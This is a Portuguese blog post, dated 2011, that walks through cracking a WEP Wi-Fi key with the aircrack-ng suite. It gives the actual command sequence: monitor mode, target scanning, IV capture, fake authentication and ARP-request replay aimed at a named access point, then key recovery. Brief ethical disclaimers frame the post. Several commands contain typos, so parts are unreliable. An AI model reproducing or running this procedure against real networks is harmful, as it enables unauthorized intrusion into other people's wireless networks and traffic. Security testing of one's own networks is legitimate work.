Pesquisa

Carregando...

Postagem em destaque

Como Instalar o LibreOffice 5.2.3

domingo, 26 de junho de 2011

Como capturar senhas com AIRCRACK-NG

Bem pessoal, esse tutorial visa ensinar de uma forma simples como capturar e descriptografar senhas wireless. Estamos em busca de conhecimento, não devemos utilizar essa tecnica para invadir a rede sem fio do vizinho, amigo, inimigo.
Para snifar, capturar e descriptografar as senhas iremos utilizar o Aircrack-ng que é uma ferramenta muito poderosa para realizar ataques a redes Wireless. Além do Aircrack-ng iremos precisar de outras ferramentas Airmon-ng, airodump-ng.
VAMOS LÁ:
  • Primeiramente iremos colocar a interface de rede em modo PROMISCUO (monitor), O comando a ser usado é:
airmon-ng start wlan0 → “aqui é importante verificar qual a sua interface de rede”
Após executar esse comando será criada uma interface de rede com a nomenclatura “mon0”, essa interface será responsável por capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.
Obs: Você não poderá estar conectado em nenhuma rede sem fio nesse momento.

  • Agora iremos escanear todas as redes disponíveis;

Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dado sobre o nosso alvo: BSSID, CANAL, CIPHER AUTH e ESSID. É preciso também anotar um mac-address que esteja conectado ao alvo escolhido.
airodump-ng mon0
com esse comando teremos a seguinte tela:
  • Nesse passo iremos capturar os vetores de inicialização:

Obs: No comando a serguir iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.

airdump-ng – -ivs -w capturar-ivs-redesegura -c 6 mon0

  • -i = Capturar apenas pacotes que contenham Ivs (–ivs);
  • -w = Prefixo do arquivo que será gerado com os dados capturados;
  • -c = Canal;
  • mon0 = interface de rede em modo promiscuo.

  • Agora iremos enviar um pedido de falsa autenticação com um mac associado ao acces point que queremos quebrar a senha:
aireplay-ng -1 0 -e rede-segura -a 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

  • -1 = Essa opção enviao ao nosso alvo uma autenticação falsa;
  • 0 = Aqui temos o tempo para reassociação, em segundos
  • -e = ESSID do alvo, ou seja, o nome do access point
  • -a = Mac-Address do Access Point alvo
  • -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
  • mon0 = interface de rede em modo promiscuo.


Feito isso é só aguardar que os vetores sejam capturados, porem para acelerar esse processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:
  • Enviando Arp request para a rede:

aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

  • -3 = Opção para arp request;
  • -b = Mac-Address do Access Point alvo
  • -h = Mac-Address associado ao access Point, no nosso caso o mac que identificamos como conectado ao AP rede-segura
  • mon0 = interface de rede em modo promiscuo.

Obs: Pode acontecer de não conectar, você deve insistir algumas vezes ou várias.

  • Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.
aircrack-ng -a 1 capturar-ivs-redesegura

  • -a = Modo para forçar o ataque
  • -1 = wep (se fosse WPA usaríamos o -2)

  • Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.

Feito isso a senha cai no nosso colo, veja a tela abaixo:

Espero ter contribuído com alguma coisa, lembro que a pratica hacker deve ser sempre exercida de forma ética, nunca para prejudicar, furtar, ou sacanear ninguém. É importante saber que existem várias outras formas de capturar senhas, essa é apenas uma.

Nenhum comentário:

Postar um comentário